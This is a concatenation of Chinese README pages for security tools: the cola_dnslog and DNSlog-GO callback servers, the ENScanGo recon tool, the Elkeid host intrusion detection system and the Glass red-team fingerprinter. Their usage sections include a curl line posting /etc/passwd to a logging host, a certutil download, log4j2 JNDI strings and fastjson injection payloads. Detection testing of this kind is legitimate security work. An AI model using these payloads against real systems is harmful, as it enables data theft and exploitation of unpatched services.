docker exec -it <container_id> cat /coladnslog/info.txt
```

> 如果需要自定义端口,请修改`docker-compose.yml`的端口映射`ports`即可
##### 前后端分离部署
服务端:
```sh
git clone https://github.com/Abelche/cola_dnslog.git
cd cola_dnslog
docker build -t coladnslog_server -f Dockerfile_server .
docker run -itd \
-e DNS_DOMAIN=example.com \
-e NS1_DOMAIN=ns1.example.com \
-e NS2_DOMAIN=ns2.example.com \
-e SERVER_IP=1.1.1.1 \
-e HTTP_PORT=80 \
-e HTTP_RESPONSE_SERVER_VERSION=nginx \
-e LDAP_PORT=1389 \
-e RMI_PORT=1099 \
--net=host \
--name ColaDnslog_server coladnslog_server
```
客户端:
```sh
git clone https://github.com/Abelche/cola_dnslog.git
cd cola_dnslog
sudo docker build --build-arg VERSION=v1.3.2 -t coladnslog_front -f Dockerfile_front .
sudo docker run -itd \
-p 18080:80 \
-e "API_BASE_URL=http://1.2.3.4:28001" \
--name ColaDnslog_front coladnslog_front
```
#### 源码安装
共分四步
##### **第一步 下载源码**
下载源码
```sh
git clone https://github.com/Abelche/cola_dnslog.git
```
> 我习惯于将服务用`tmux`放到后台运行
##### **第二步 启动webserver**
安装python(python>=3.7)依赖
注意,需要用python3.7及以上版本,否则会有兼容性问题,多python推荐使用conda
```sh
cd cola_dnslog
pip install -r requirements.txt
```
修改根目录下的`config.yaml`
主要需要修改`DNS_DOMAIN` `NS1_DOMAIN` `NS2_DOMAIN` `SERVER_IP`
可选: 修改`HTTP_RESPONSE_SERVER_VERSION`伪造http返回中Server字段
```yaml
global:
DB_FILENAME: sqlite.db
logserver:
DNS_DOMAIN: example.com
NS1_DOMAIN: ns1.example.com
NS2_DOMAIN: ns2.example.com
SERVER_IP: 1.1.1.1
DNS_PORT: 53
HTTP_HOST: 0.0.0.0
HTTP_PORT: 80
HTTP_RESPONSE_SERVER_VERSION: nginx
LDAP_HOST: 0.0.0.0
LDAP_PORT: 1389
RMI_HOST: 0.0.0.0
RMI_PORT: 1099
webserver:
HOST: 0.0.0.0
PORT: 28001
PASSWORD_SALT: 随便一长串字符串,如:cuau89j2iifdas8
```
启动webserber端和logserver端,注意这里一定要先启动webserver端(因为要先通过webserver端初始化数据库,初始化之后会在终端输出账号、密码、token、logid等信息。
```sh
chmod +x start_webserver
./start_webserver
```

##### **第三步 启动logserver**(需要root权限)
```sh
chmod +x start_logserver
sudo ./start_logserver
```

##### **第四步 启动前端**
现在来到前端(不一定要和webserver放在一起,你甚至可以通过electron打包成本地客户端),先修改配置文件`.env.production`
```sh
cd src/front
vim .env.production
```
```ini
# just a flag
ENV = 'production'
# base api
VUE_APP_BASE_API = 'http://1.1.1.1:28001'
TARGET_API = 'http://1.1.1.1:28001'
```
然后npm安装依赖、打包、启动http服务(这里可以随意选择http服务器,为了方便我直接用python启动)
```sh
cd src/front
npm install
npm run build:prod
cd dist
python3 -m http.server 18001
```
至此,三端(webserver端、logserver端、webui前端)已经全部开启!
这时,访问http://1.1.1.1:18001应该可以看到登录页面!
玩得开心!
### 钉钉机器人
在钉钉群新建机器人,安全设置:添加自定义关键词`coladnslog`

并获取到webhook的token,注意,只需要填写token即可

进入webui,修改Dingtalk Robot Token为上文获取的token,点击Update保存即可

效果如下:
<img src="https://github.com/AbelChe/cola_dnslog/raw/main/readme_resource/image-20220731231301577.png" alt="image-20220731231301577" style="zoom:33%;" />
### Bark
[Finb/Bark: Bark is an iOS App which allows you to push custom notifications to your iPhone (github.com)](https://github.com/Finb/Bark)
[Finb/bark-server: Backend of Bark (github.com)](https://github.com/Finb/bark-server)
同上 进入webui,开启Bark开关,然后修改bark url,点击Update保存

效果如下:
<img src="https://github.com/AbelChe/cola_dnslog/raw/main/readme_resource/image-20220802015642879.png" alt="image-20220802015642879" style="zoom: 25%;" />
### 如何使用
上文提到,假定我的域名和ip是`example.com`和`1.1.1.1`,并且我们账户的logid为`qrq`
#### DNS
```sh
nsloopup `whoami`.qrq.example.com
ping `whoami`.qrq.example.com
```
#### HTTP
```sh
curl 1.1.1.1/qrq/some/info
curl -d @/etc/passwd 1.1.1.1/qrq/postdata
certutil -urlcache -split -f http://1.1.1.1/x x
```
#### LDAP
log4j2 fastjson等可以使用此方法
注意这里必须要令最后路径的最后作为logid,如:`ldapqrq` `xxxxqrq` `qrq` `xxx/qrq`
```
${jndi:ldap://1.1.1.1:1389/ldapqrq}
{"@type":"LLcom.sun.rowset.JdbcRowSetImpl;;","dataSourceName":"ldap://1.1.1.1:1389/ldapqrq", "autoCommit":true}
```
#### RMI
同上,log4j2 fastjson等
```
${jndi:rmi://1.1.1.1:1099/rmiqrq}
{ "b":{ "@type":"com.sun.rowset.JdbcRowSetImpl", "dataSourceName":"rmi://1.1.1.1:1099/rmiqrq", "autoCommit":true } }
```
## 👀 概览
### 登录

### 首页

### Dnslog

### Httplog

### Ldaplog

### Rmilog

### 账号信息

### 钉钉机器人
<img src="readme_resource/image-20220731231301577.png" alt="image-20220731231301577" style="zoom: 25%;" />
### Bark
<img src="readme_resource/image-20220802015642879.png" alt="image-20220802015642879" style="zoom: 25%;" />
<!--auto_detail_active_begin_e1c6fb434b6f0baf6912c7a1934f772b-->
## 项目相关
## 最近更新
<!--auto_detail_active_end_f9cf7911015e9913b7e691a7a5878527-->
================================================
FILE: detail/CyberStrikeAI.md
================================================
## CyberStrikeAI <https://github.com/Ed1s0nZ/CyberStrikeAI>
<!--auto_detail_badge_begin_0b490ffb61b26b45de3ea5d7dd8a582e-->





<!--auto_detail_badge_end_fef74f2d7ea73fcc43ff78e05b1e7451-->
<!--auto_detail_active_begin_e1c6fb434b6f0baf6912c7a1934f772b-->
## 项目相关
## 最近更新
#### [v1.3.23] - 2026-03-10
- 更新 config.yaml
#### [v0.0.11] - 2025-12-28
<!--auto_detail_active_end_f9cf7911015e9913b7e691a7a5878527-->
================================================
FILE: detail/DNSlog-GO.md
================================================
## DNSlog-GO <https://github.com/lanyi1998/DNSlog-GO>
<!--auto_detail_badge_begin_0b490ffb61b26b45de3ea5d7dd8a582e-->





<!--auto_detail_badge_end_fef74f2d7ea73fcc43ff78e05b1e7451-->
DNSLog-GO 是一款golang编写的监控 DNS 解析记录的工具,自带多用户WEB界面
演示截图:

安装
---
详细图文教程:https://mp.weixin.qq.com/s/m_UXJa0imfOi721bkBpwFg
# 1.获取发行版
这里 https://github.com/lanyi1998/DNSlog-GO/releases 下载最新发行版,并解压
或者docker启动
```shell
wget https://raw.githubusercontent.com/lanyi1998/DNSlog-GO/master/config.yaml
#修改你的config.yaml文件
docker run -d -p 53:53 -p 53:53/udp -p 8000:8000 -v `pwd`/config.yaml:/DNSlog-GO/config.yaml --name dnslog --privileged lanyi1998/dnslog-go:latest
#设置开机启动
docker update --restart=always dnslog
```
# 2.域名与公网 IP 准备
```
搭建并使用 DNSLog,你需要拥有一个域名如(a.com),还需要有一个公网 IP 地址(如:1.1.1.1)
修改 a.com 的 NS 记录为
NS1.vpsip.NIP.IO
NS2.vpsip.NIP.IO
如
ns1.1.1.1.1.nip.io
ns1.1.1.1.1.nip.io
本步骤中,需要在域名提供商提供的页面进行设置,部分域名提供商只允许修改 NS 记录为已经认证过的 NS 地址。所以需要找一个支持修改 NS 记录为自己 NS 的域名提供商。
注意: NS 记录修改之后部分地区需要 24-48 小时会生效
```
# 3.修改配置文件 config.ini
```
HTTP:
port: 8000 //http web监听端口
#{"token":"用户对应子域名"}
user: { "admin": "admin" } //用户admin 对应的dnslog子域名是 admin.demo.com
consoleDisable: false //是否关闭web页面
Dns:
domain: demo.com //dnslog域名
```
# 4.启动对应系统的客户端
**注意服务端重启以后,如果修改了用户对应子域名,必须清空一下浏览器中的localStorage,否则会获取不到数据**
---
API Python Demo
```python
import requests
import random
import json
class DnsLog():
domain = ""
token = ""
Webserver = ""
def __init__(self, Webserver, token):
self.Webserver = Webserver # dnslog的http监听地址,格式为 ip:端口
self.token = token # token
# 检测DNSLog服务器是否正常
try:
res = requests.post("http://" + Webserver + "/api/verifyToken", json={"token": token}).json()
self.domain = res.Msg
except:
exit("DnsLog 服务器连接失败")
if res["Msg"] == "false":
exit("DnsLog token 验证失败")
# 生成随机子域名
def randomSubDomain(self, length=5):
subDomain = ''.join(random.sample('zyxwvutsrqponmlkjihgfedcba', length)) + '.' + self.domain
return subDomain
# 验证子域名是否存在
def checkDomain(self, domain):
res = requests.post("http://" + self.Webserver + "/api/verifyDns", json={"Query": domain},
headers={"token": self.token}).json()
if res["Msg"] == "false":
return False
else:
return True
url = "http://192.168.41.2:8090/"
dns = DnsLog("1111:8888", "admin")
subDomain = dns.randomSubDomain()
payload = {
"b": {
"@type": "java.net.Inet4Address",
"val": subDomain
}
}
requests.post(url, json=payload)
if dns.checkDomain(subDomain):
print("存在FastJosn")
```
<!--auto_detail_active_begin_e1c6fb434b6f0baf6912c7a1934f772b-->
## 项目相关
## 最近更新
#### [v2.3.1] - 2026-01-21
**修正** :
- 增加client pool大小和时间,避免服务器还没有收到dnslog,client就已经开始验证
#### [v2.3.0] - 2025-12-29
**feat** :
-SSRF请求获取功能
#### [v2.2.2] - 2025-09-09
**refactor(pkg/sdk)** :
-更新 DnsLogClient 的 Clear 方法
-将 clear 方法的首字母大写,改为 Clear,以符合 Go语言的导出规则
- 添加了注释,明确了函数的功能
#### [v2.2.0] - 2025-08-22
**添加**
- 添加 LDAP 和 RMI 协议的 payload
- 在 copyText 方法中增加了 LDAP 和 RMI 协议的 payload生成
- 使用 location.protocol 和 location.host 生成 SSRF payload
- 将 domain 的第一个部分作为 subdomain 使用
- 添加了换行符以提高代码可读性
#### [v2.1.4] - 2025-07-22
**修复**
- getDnsData_clear api死锁的问题
<!--auto_detail_active_end_f9cf7911015e9913b7e691a7a5878527-->
================================================
FILE: detail/ENScanGo.md
================================================
## ENScanGo <https://github.com/wgpsec/ENScan_GO>
<!--auto_detail_badge_begin_0b490ffb61b26b45de3ea5d7dd8a582e-->





<!--auto_detail_badge_end_fef74f2d7ea73fcc43ff78e05b1e7451-->
剑指HW/SRC,解决在HW/SRC场景下遇到的各种针对国内企业信息收集难题
## 🤷♂️郑重声明
文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担。
使用均为公开数据,**不提供破解、绕过防护手段**,使用程序可能导致 ⌈账号异常⌋
**若该程序影响或侵犯到您的合法权益,请与我们联系** admin#wgpsec.org(#替换为@)
## ⚒️功能列表

- 支持以下数据源
- 爱企查
- 天眼查
- 快查
- 企查查(不提供)
- 小蓝本(不提供)
- 数据插件
- 阿拉丁 (数据反馈比较老旧暂时下线)
- 酷安市场
- 七麦数据
- 备案信息查询API
- 可查询信息
- ICP备案
- APP
- 微博
- 微信公众号
- 控股公司
- 供应商
- 小程序
- 公开招聘信息
- 对外投资信息
- ...
- 实用功能
- 支持合并导出
- 正则过滤公司
- 支持深度查询 收集多层孙公司
- 支持API模式提供工具联动
## 使用指南
### 首次使用
前往[RELEASE](https://github.com/wgpsec/ENScan_GO/releases)下载编译好的文件使用
首次使用时需要使用 -v 命令生成配置文件并配置Cookie
```
./enscan -v
```
### 快速使用
*如遇到无法访问等情况,可自行尝试挂上burp或代理*
**默认公司信息** (网站备案, 微博, 微信公众号, app)
```
./enscan -n 小米
```
**批量查询**( 文本按行分隔 可选PID模式)
```
./enscan -f f.txt
```
**对外投资占股100%的公司**
```
./enscan -n 小米 -invest 100
```
**组合筛选**
大于51%公司、分支机构,只要ICP备案信息
```
./enscan -n 小米 -field icp -invest 51 --branch
```
收集孙公司 (deep参数,需要与invest一起使用) 大于51%公司、分支机构,只要ICP备案信息
```
./enscan -n 小米 -field icp -invest 51 --branch --deep 2
```
**使用不同渠道**
使用天眼查数据源(或可设定为 all 组合多个数据源)
```
./enscan -n 小米 -type tyc
```
使用多数据源一起收集(暂不支持多渠道+筛选)
```
./enscan -n 小米 -type aqc,tyc
```
使用插件渠道
```
./enscan -n 小米 -type aqc,miit
```
**请设置请求延时,防止造成影响**
```
./enscan -n 小米 -delay 3
```
### Cookie配置
**AQC**
出现安全验证请使用获取cookie的浏览器过验证即可继续,默认查询为 aiqicha.baidu.com
Cookie信息请勿直接 `document.cookie`,可能因为http-only 选项无法复制全导致登陆失败

**TYC tycid**
配置COOKIE后配置tycid

其他Cookie请自行参考获取
### 选项说明
#### **field 获取字段**
使用参数 `field`指定需要查询的信息,可指定多参数一起查询,方便快速收集
```
-n 小米 -field icp,app
```
支持以下参数
- `icp` 网站备案信息
- `weibo` 微博
- `wechat` 微信公众号
- `app` 应用信息
- `job` 招聘信息
- `wx_app` 微信小程序
- `copyright` 软件著作权
- `supplier` 供应商信息(通过招标书确定)
- 其他(根据插件情况更新)
#### **type 获取字段**
使用参数 `type`可以指定需要API数据源
```
-n 小米 -type tyc
```
**查询数据源**
- `aqc` 爱企查
- `tyc` 天眼查
- `kc` 快查
- `all` 全部查询
**插件**
- `aldzs` 阿拉丁 (仅小程序)
- `coolapk` 酷安市场 (仅APP)
- `qimai` 七麦数据(仅APP)
- `miit` HG-ha 的 ICP_Query (ICP备案、APP、小程序、快应用) **非狼组维护,团队成员请使用内部版本**
#### 完整参数
*文档更新不及时,请以程序提示为准*
| 参数 | 样例 | 说明 |
| -------------- | -------------- | ------------------------------------------------------------ |
| -n | 小米 | 关键词 |
| -i | 29453261288626 | 公司PID(自动识别类型) |
| -f | file.txt | 批量查询,文本按行分隔(可选PID模式) |
| -type | aqc | API类型 |
| -o | | 结果输出的文件夹位置(可选) |
| -is-merge | | 合并导出 |
| -invest | | 投资比例 |
| -field | icp | 获取字段信息 |
| -deep | 1 | 递归搜索n层公司,需搭配invest使用 |
| -hold | | 是否查询控股公司(可能需要VIP账户) |
| -supplier | | 是否查询供应商信息 |
| -branch | | 查询分支机构(分公司)信息 |
| -is-branch | | 深度查询分支机构信息(数量巨大) |
| -api | | 是否API模式 |
| -debug | | 是否显示debug详细信息 |
| -is-show | | 是否展示信息输出 |
| -is-group | | 查询关键词为集团 |
| -is-pid | | 批量查询文件是否为公司PID |
| -delay | | 每个请求延迟(S)-1为随机延迟1-5S |
| -branch-filter | | 提供一个正则表达式,名称匹配该正则的分支机构和子公司会被跳过 |
| -proxy | | 设置代理 |
| -timeout | | 每个请求默认1(分钟)超时 |
| -no-merge | | 批量查询【取消】合并导出 |
| -v | | 版本信息 |
### API模式
**api调用效果**
可使用 https://enscan.wgpsec.org/api/info 体验 (因被滥用下线)
🥹plat平台已停止维护,不要问了~




#### API说明
获取信息将实时查询展示,可与其他工具进行API联动,请注意**不要开放到公网**
**获取信息**
```
GET /api/info?search=小米&invest=100&branch=true
```
| 参数 | 参数 | 说明 |
| -------- | -------------------- | -------------------------- |
| name | 文本 | 完整公司名称(二选一) |
| type | 文本,与命令参数一致 | 数据源 |
| field | 文本,与命令参数一致 | 筛选指定信息 |
| depth | 数字 | 爬取几层公司 如 2 为孙公司 |
| invest | 数字 | 筛选投资比例 |
| holds | true | 筛选控股公司 |
| supplier | true | 筛选供应商信息 |
| branch | true | 筛选分支信息 |
| output | true | 为true导出excel表格下载 |
#### 启动部署
**golang 版本依赖**
```
go >= 1.22.1
```
**API模式**
启动API模式将在31000端口监听,并启动api服务,可通过api服务进行调用读取数据
```
./enscan --api
```
<!--auto_detail_active_begin_e1c6fb434b6f0baf6912c7a1934f772b-->
## 项目相关
## 最近更新
#### [v2.0.4] - 2025-10-31
**修复**
- 修复查询多级投资信息卡死问题
#### [v2.0.3] - 2025-10-23
**修复**
- 修复tyc bug
**修复**
- list bug
#### [v1.3.1] - 2025-07-22
**修复**
- 修复查询投资企业名称bug
**新增**
- 增加RB的查询超限提示
#### [v1.2.2] - 2025-05-20
**修复**
- 修复TYC查询问题。
#### [v1.2.1] - 2025-03-29
**更新**
- 增加支持介入MCP协议,方便接入本地大模型调用。
<!--auto_detail_active_end_f9cf7911015e9913b7e691a7a5878527-->
================================================
FILE: detail/Elkeid.md
================================================
## Elkeid <https://github.com/bytedance/Elkeid>
<!--auto_detail_badge_begin_0b490ffb61b26b45de3ea5d7dd8a582e-->





<!--auto_detail_badge_end_fef74f2d7ea73fcc43ff78e05b1e7451-->
[English](https://github.com/bytedance/Elkeid/blob/main/README.md) | 简体中文
**Elkeid** 是一款可以满足 **主机,容器与容器集群,Serverless** 等多种工作负载安全需求的开源解决方案,源于字节跳动内部最佳实践。
随着企业的业务发展,多云、云原生、多种工作负载共存的情况愈发凸显,我们希望可以有一套方案可以满足不同工作负载下的安全需求,因此 **Elkeid** 诞生了。
## Introduction
Elkeid 具备以下主要能力:
* **Elkeid** 不仅具备传统的 **HIDS(Host Intrusion Detection System)** 的对于主机层入侵检测和恶意文件识别的能力,且对容器内的恶意行为也可以很好的识别,部署在宿主机即可以满足宿主机与其上容器内的反入侵安全需求,并且 **Elkeid** 底层强大的内核态数据采集能力可以满足大部分安全运营人员对于主机层数据的渴望。
* 对于运行的业务 **Elkeid** 具备 **RASP** 能力可以注入到业务进程内进行反入侵保护,不仅运维人员不需要再安装一个 Agent,业务也无需重启。
* 对于 **K8s** 本身 **Elkeid** 支持接入**K8s Audit Log** 对 **K8s** 系统进行入侵检测和风险识别。
* **Elkeid** 的规则引擎 **Elkeid HUB** 也可以很好的和外部多系统进行联动对接。
**Ekeid** 将这些能力都很好的融合在一个平台内,满足不同工作负载的复杂安全需求的同时,还能实现多组件能力关联,更难得的是每个组件均经过字节跳动海量数据和多年的实战检验。
## Elkeid Community Edition Description
需要注意的是 **Elkeid** **开源版本** 和完整版本存在差异,目前已开源的能力主要包括:
* 全部端上能力,即端上数据/资产/部分采集能力,内核态数据采集能力,RASP 探针部分等,并与字节跳动内部版本一致;
* 全部接入层能力,即 Agent Center,服务发现等,并与字节跳动内部版本一致;
* 提供社区版规则引擎即 Elkeid HUB,并配套少量策略作为示例使用;
* 提供社区版 Elkeid Console 与部分配套能力。
因此需要具备完整的反入侵与风险感知能力,还需要自行基于 Elkeid HUB 进行策略构建和对 Elkeid 采集的数据进行二次加工等工作。
## Elkeid Architecture
<img src="https://github.com/bytedance/Elkeid/raw/main/server/docs/server_new.png"/>
## Elkeid Host Ability
* **[Elkeid Agent](https://github.com/bytedance/Elkeid/blob/main/agent/README-zh_CN.md)** 用户态 Agent,负责管理各个端上能力组件并与 **Elkeid Agent Center** 通信
* **[Elkeid Driver](https://github.com/bytedance/Elkeid/blob/main/driver/README-zh_CN.md)** 负责 Linux Kernel 层采集数据,兼容容器,并能够检测常见 Rootkit
* **[Elkeid RASP](https://github.com/bytedance/Elkeid/blob/main/rasp)** 支持 CPython、Golang、JVM、NodeJS、PHP 的运行时数据采集探针,支持动态注入到运行时
* **Elkeid Agent Plugin List**
* [Driver Plugin](https://github.com/bytedance/Elkeid/blob/main/plugins/driver): 负责与 **Elkeid Driver** 通信,处理其传递的数据等
* [Collector Plugin](https://github.com/bytedance/Elkeid/blob/main/plugins/collector): 负责端上的资产/关键信息采集工作,如用户,定时任务,包信息等
* [Journal Watcher](https://github.com/bytedance/Elkeid/blob/main/plugins/journal_watcher): 负责监测systemd日志的插件,目前支持ssh相关日志采集与上报
* [Scanner Plugin](https://github.com/bytedance/Elkeid/blob/main/plugins/scanner): 负责在端上进行静态检测恶意文件的插件,支持 Yara
* [RASP Plugin](https://github.com/bytedance/Elkeid/blob/main/rasp/plugin): 分析系统进程运行时,上报运行时信息,处理下发的 Attach 指令,收集各个探针上报的数据
* [Baseline Plugin](https://github.com/bytedance/Elkeid/blob/main/plugins/baseline): 负责在端上进行基线风险识别的插件
* [**Elkeid 数据说明**](https://github.com/bytedance/Elkeid/blob/main/server/docs/ElkeidData.xlsx)
* [**Elkeid 数据接入**](https://github.com/bytedance/Elkeid/blob/main/elkeidup/raw_data_usage_tutorial/raw_data_usage_tutorial-zh_CN.md)
## Elkeid Backend Ability
* **[Elkeid AgentCenter](https://github.com/bytedance/Elkeid/blob/main/server/agent_center)** 负责与 Agent 进行通信并管理 Agent 如升级,配置修改,任务下发等
* **[Elkeid ServiceDiscovery](https://github.com/bytedance/Elkeid/blob/main/server/service_discovery)** 后台中的各组件都会向该组件定时注册、同步服务信息,从而保证各组件相互可见,便于直接通信
* **[Elkeid Manager](https://github.com/bytedance/Elkeid/blob/main/server/manager)** 负责对整个后台进行管理,并提供相关的查询、管理接口
* **[Elkeid Console](https://github.com/bytedance/Elkeid/blob/main/server/web_console)** Elkeid 前端部分
* **[Elkeid HUB](https://github.com/bytedance/Elkeid-HUB)** 策略引擎
## Elkeid Function List
| 功能 | Elkeid Community Edition | Elkeid Enterprise Edition |
|--------------------|--------------------------|---------------------------|
| Linux 数据采集能力 | :white_check_mark: | :white_check_mark: |
| RASP 探针能力 | :white_check_mark: | :white_check_mark: |
| K8s Audit Log 采集能力 | :white_check_mark: | :white_check_mark: |
| Agent 控制面 | :white_check_mark: | :white_check_mark: |
| 主机状态与详情 | :white_check_mark: | :white_check_mark: |
| 勒索诱饵 | :ng_man: | :white_check_mark: |
| 资产采集 | :white_check_mark: | :white_check_mark: |
| 高级资产采集 | :ng_man: | :white_check_mark: |
| 容器集群资产采集 | :white_check_mark: | :white_check_mark: |
| 暴露面与脆弱性分析 | :ng_man: | :white_check_mark: |
| 主机/容器 基础入侵检测 | `少量样例` | :white_check_mark: |
| 主机/容器 行为序列入侵检测 | :ng_man: | :white_check_mark: |
| RASP 基础入侵检测 | `少量样例` | :white_check_mark: |
| RASP 行为序列入侵检测 | :ng_man: | :white_check_mark: |
| K8S 基础入侵检测 | `少量样例` | :white_check_mark: |
| K8S 行为序列入侵检测 | :ng_man: | :white_check_mark: |
| K8S 威胁分析 | :ng_man: | :white_check_mark: |
| 告警溯源(行为溯源) | :ng_man: | :white_check_mark: |
| 告警溯源(驻留溯源) | :ng_man: | :white_check_mark: |
| 告警白名单 | :white_check_mark: | :white_check_mark: |
| 多告警聚合能力 | :ng_man: | :white_check_mark: |
| 威胁处置(进程) | :ng_man: | :white_check_mark: |
| 威胁处置(网络) | :ng_man: | :white_check_mark: |
| 威胁处置(文件) | :ng_man: | :white_check_mark: |
| 文件隔离箱 | :ng_man: | :white_check_mark: |
| 漏洞检测 | `少量情报` | :white_check_mark: |
| 漏洞情报热更新 | :ng_man: | :white_check_mark: |
| 基线检查 | `少量基线` | :white_check_mark: |
| RASP 热补丁 | :ng_man: | :white_check_mark: |
| 病毒扫描 | :white_check_mark: | :white_check_mark: |
| 用户行为日志分析 | :ng_man: | :white_check_mark: |
| 插件管理 | :white_check_mark: | :white_check_mark: |
| 系统监控 | :white_check_mark: | :white_check_mark: |
| 系统管理 | :white_check_mark: | :white_check_mark: |
| Windows 支持 | :ng_man: | :white_check_mark: |
| 蜜罐 | :ng_man: | :oncoming_automobile: |
| 主动防御 | :ng_man: | :oncoming_automobile: |
| 云查杀 | :ng_man: | :oncoming_automobile: |
| 防篡改 | :ng_man: | :oncoming_automobile: |
## Front-end Display (Community Edition)
**安全概览**
<img src="https://github.com/bytedance/Elkeid/raw/main/png/console0.png" style="float:left;"/>
**容器集群安全告警**
<img src="https://github.com/bytedance/Elkeid/raw/main/png/console1.png" style="float:left;"/>
**容器集群工作负载信息**
<img src="https://github.com/bytedance/Elkeid/raw/main/png/console2.png" style="float:left;"/>
****
**主机概览**
<img src="https://github.com/bytedance/Elkeid/raw/main/png/console3.png" style="float:left;"/>
**资产指纹**
<img src="https://github.com/bytedance/Elkeid/raw/main/png/console4.png" style="float:left;"/>
**安全告警**
<img src="https://github.com/bytedance/Elkeid/raw/main/png/console5.png" style="float:left;"/>
**漏洞信息**
<img src="https://github.com/bytedance/Elkeid/raw/main/png/console6.png" style="float:left;"/>
**基线检查**
<img src="https://github.com/bytedance/Elkeid/raw/main/png/console7.png" style="float:left;"/>
**病毒扫描**
<img src="https://github.com/bytedance/Elkeid/raw/main/png/console8.png" style="float:left;"/>
**后端监控**
<img src="https://github.com/bytedance/Elkeid/raw/main/png/console9.png" style="float:left;"/>
**后端服务监控**
<img src="https://github.com/bytedance/Elkeid/raw/main/png/console10.png" style="float:left;"/>
## Console User Guide
* **[ELkeid Console User Guide](https://github.com/bytedance/Elkeid/blob/main/server/docs/console_tutorial/Elkeid_Console_manual.md)**
## Quick Start
* **[通过Elkeidup部署](https://github.com/bytedance/Elkeid/blob/main/elkeidup/README-zh_CN.md)**
<!--auto_detail_active_begin_e1c6fb434b6f0baf6912c7a1934f772b-->
## 项目相关
- 2021-11-10 发布文章[《抗击黑客:如何利用Elkeid构建入侵检测能力》](https://mp.weixin.qq.com/s/iwvkIdgMblVOH7Agg_wXtQ)
## 最近更新
<!--auto_detail_active_end_f9cf7911015e9913b7e691a7a5878527-->
================================================
FILE: detail/Glass.md
================================================
## Glass <https://github.com/s7ckTeam/Glass>
<!--auto_detail_badge_begin_0b490ffb61b26b45de3ea5d7dd8a582e-->





<!--auto_detail_badge_end_fef74f2d7ea73fcc43ff78e05b1e7451-->
# Glass(镜) V2.0-剑客到刺客的蜕变
## 一、简介:
```
_____ _ _____
__|___ |__| | __ |_ _|__ __ _ _ __ ___
/ __| / / __| |/ / | |/ _ \/ _` | '_ ` _ \
\__ \/ / (__| < | | __/ (_| | | | | | |
|___/_/ \___|_|\_\ |_|\___|\__,_|_| |_| |_|
____ _
/ ___| | __ _ ___ ___
| | _| |/ _` / __/ __|
| |_| | | (_| \__ \__ \
\____|_|\__,_|___/___/ http://www.s7ck.com
```
Glass为s7ck Team 红队武器库F-Box里的一款信息收集工具。
在红队作战中,信息收集是必不可少的环节,如何才能从大量的资产中提取有用的系统(如OA、VPN、路由、Weblogic...)是众多红队人员头疼的问题。
Glass是一款针对资产列表的快速指纹识别工具,通过调用Fofa/ZoomEye/Shodan/360等api接口快速查询资产信息并识别重点资产的指纹,也可针对IP/IP段或资产列表进行快速的指纹识别。
Glass旨在帮助红队人员在资产信息收集期间能够快速从C段、大量杂乱的资产中精准识别到易被攻击的系统,从而实施进一步测试攻击。
s7ck Team F-box旨在通过开源或者开放的方式,长期维护并推进涉及安全研究各个领域不同环节的工具化,高度自动化,将立足于不同安全领域、不同安全环节的研究人员和工具链接/封装/优化起来。
主要目的是改善安全圈内工具庞杂、水平层次不齐、开源无人维护、工具找不到的等多种问题,营造一个更好更开放的安全工具促进与交流的技术氛围。
### 开发语言
* Python3
### 运行环境
* Linux
* Windows
* Mac
### 使用依赖库
* requests
* colorama
* prettytable
* xlsxwriter
### 安装
git clone https://github.com/s7ckTeam/Glass
cd Glass
pip3 install -r requirements.txt
## 二、更新日志:
### 正式版
* 2.0.6 更改默认搜索设置,添加哪个`api`就会默认调用哪个,不需要指定,如果有多个`api`可`-s`指定
* 2.0.5 添加自定义搜索(-s,--search)
1. 添加钟馗之眼(https://www.zoomeye.org/)搜索
2. 在`config/config.py`中`zoomeyeApi`设置,输入`key`值即可(**注:** 用的时候注意api使用条数)
3. -s参数[eye(钟馗之眼) or fofa(Fofa)](python3 Glass.py -i 127.0.0.1 -s eye or fofa)
4. 不加参数`-s`默认使用`fofa`搜索
* 2.0.4 添加删除更新的缓存文件
* 2.0.3 扫描域名或批量扫描时可不加协议(**注:** 建议添加协议)
* 2.0.2 增加自定义输出格式(-o,--output)
1. 支持输出的格式有:`txt`、`json`、`html`、`xls`、`csv`
2. 默认输出`txt`格式
3. 输出目录在根目录`output`下
* 2.0
1. 增加代理功能(--proxy)
- 全局访问代理,支持http、https
- 支持自定义(格式:http://127.0.0.1:8080或者https://127.0.0.1:8080)
- 首次使用会按照参数获取相应代理,然后在根目录生成`/proxyFile/proxy.txt`
- 参数(all)使用全部代理进行随机分配
- 参数(cn)使用国内代理进行随机分配
- 参数(http://127.0.0.1:8080或者https://127.0.0.1:8080) 自定义的代理
2. 增加获取代理功能(--proxy-list)
- 首次使用会按照参数获取相应代理,然后在根目录生成`/proxyFile/proxy.txt`
- 参数(all)获取全部
- 参数(cn)获取国内
3. 增加在线更新功能(--update)
4. 去除print,改用logging输出
5. 优化运行代码,后期还会优化
6. 增加对url协议使用相应协议的代理
7. 增加查看版本参数(-v,--version)
8. 使用不生成pyc文件
9. 全局随机分配代理,获取到多少就用多少,每次访问都不一样
10. 将获取到的代理文件保存,根目录生成`/proxyFile/proxy.txt`,终端以表格形式输出,一目了然
11. 增加版本判断,建议使用 >=python 3.7.3
12. 对证书认证方面的处理
13. 每过15分钟会重新获取一次代理IP
* 1.3(添加`cookie`识别方式,将识别规则改为列表,防止重复的cms不带入识别,识别精准度提高,速度更快)
* 1.2(修复编码问题,以及fofa会员获取数量问题,现在默认`100`,在`config/config.py`中`fofaSize`更改,普通会员为`100`,高级`10000`,企业`100000`,请自行更改)
* 1.1(处理每日一说超时后写入空文件问题)
* 1.0(全面优化识别效率,命中率`99%`)
* 0.9(添加每日一说获取异常,添加识别规则)
### Glass V2.0新版内容部分截图



### 测试版更新信息
- 0.9(优化IP段的扫描,以及批量下可添加IP段)
- 0.8(更改线程运行方式)
- 0.7(与协程对比,最好还是用线程并发)
- 0.6(更改配色方案,采用线程并发,增加单url以及批量url识别)
- 0.5(优化采集速度以及与识别分开,增加输出)
- 0.4(整理识别规则)
- 0.3(添加指纹扫描)
- 0.2(更新每天一说,让红队不再乏味)
- 0.1(写出整体实现功能,Fofa接口的设置与采集)
## 三、使用方法:
```
Usage: python3 Glass.py -i 127.0.0.1 or 127.0.0.0/24
Usage: python3 Glass.py -i 127.0.0.1 -s eye or fofa
Usage: python3 Glass.py -f ips.txt
Usage: python3 Glass.py -u https://96.mk/
Usage: python3 Glass.py -w webs.txt
Usage: python3 Glass.py --proxy-list all or cn
Usage: python3 Glass.py (-i -f -u -w) 127.0.0.1 or 127.0.0.0/24 --proxy all or cn
Usage: python3 Glass.py --update
Usage: python3 Glass.py -u https://96.mk/ -o html
